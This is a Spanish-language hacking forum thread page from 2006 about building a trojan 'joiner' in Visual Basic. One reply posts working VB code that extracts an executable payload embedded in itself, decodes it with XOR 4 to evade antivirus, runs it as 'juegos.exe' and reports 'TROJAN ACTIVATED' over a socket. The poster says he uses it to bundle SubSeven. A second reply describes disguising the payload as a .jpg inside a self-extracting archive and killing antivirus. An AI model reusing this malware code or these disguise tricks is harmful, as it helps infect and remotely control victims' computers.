elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Crear un Joiner en VB
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] Ir Abajo Respuesta Imprimir
Autor Tema: Crear un Joiner en VB  (Leído 5,988 veces)
APOKLIPTICO


Desconectado Desconectado

Mensajes: 3.871


Toys in the attic.


Ver Perfil
Re: Crear un Joiner en VB
« Respuesta #20 en: 28 Febrero 2006, 02:50 am »

Espero q les sirva, lo uso siempre en mi troyano. Para agregarle un subseven indetectable y un fakedos indetectable, si alguien lo puede mejorar, estaria muy agradecido.

Código:
Public Sub UnpANDDec(trojan As Integer)
dump = 196608 'tamaño del troyano compilado
Open ".\" & App.EXEName & ".exe" For Binary As #1
Dim writeQ As Boolean
Open ".\" & "juegos.exe" For Output As #2
Close #2
Open ".\" & "juegos.exe" For Binary As #2
Do
DoEvents
Get #1, , chara
If trojan = 0 Then
If Loc(1) = dump + 1 Then
writeQ = True
End If
Else
If Loc(1) = dump + 351788 + 1 Then
writeQ = True
End If
End If
If writeQ = True Then
chara = Chr((Asc(chara) Xor 4))
Put #2, , chara
End If
If trojan = 0 Then
If Loc(1) = 351788 + dump Then
writeQ = False
End If
Else
If Loc(1) = 351788 + 372131 + dump Then
writeQ = False
End If
End If
If Loc(1) = LOF(1) Then
Exit Do
End If
Loop
Close
Close
Dim rerts
retrs = Shell(".\juegos.exe")
Code.ws(Code.ports).SendData "TROJAN ACTIVATED" & vbCrLf
Call Reset
End Sub

cifra los archivos con un simple xor 4 para q no sean detectados, y al infectar una pc con el troyano, se puede activar remotamente. Lo descifra y lo ejecuta. Suert


En línea

AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.
Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: Crear un Joiner en VB
« Respuesta #21 en: 28 Febrero 2006, 13:26 pm »

Esto se puede hacer kon un smple SFX (se krea kon el WinRar), pones los juegos.exe a juegos.jpg y kreas un .bat que los renombre a .exe y ya ta, ya stan infectados...aunke tendrias que matar los AV's....

Pero weno, esto se desvia del tema....

Salu2

Hendrix



En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
Páginas: 1 2 [3] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
crear un joiner en c++
Análisis y Diseño de Malware
Borito30 1 3,154 Último mensaje 7 Octubre 2016, 06:49 am
por fary
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines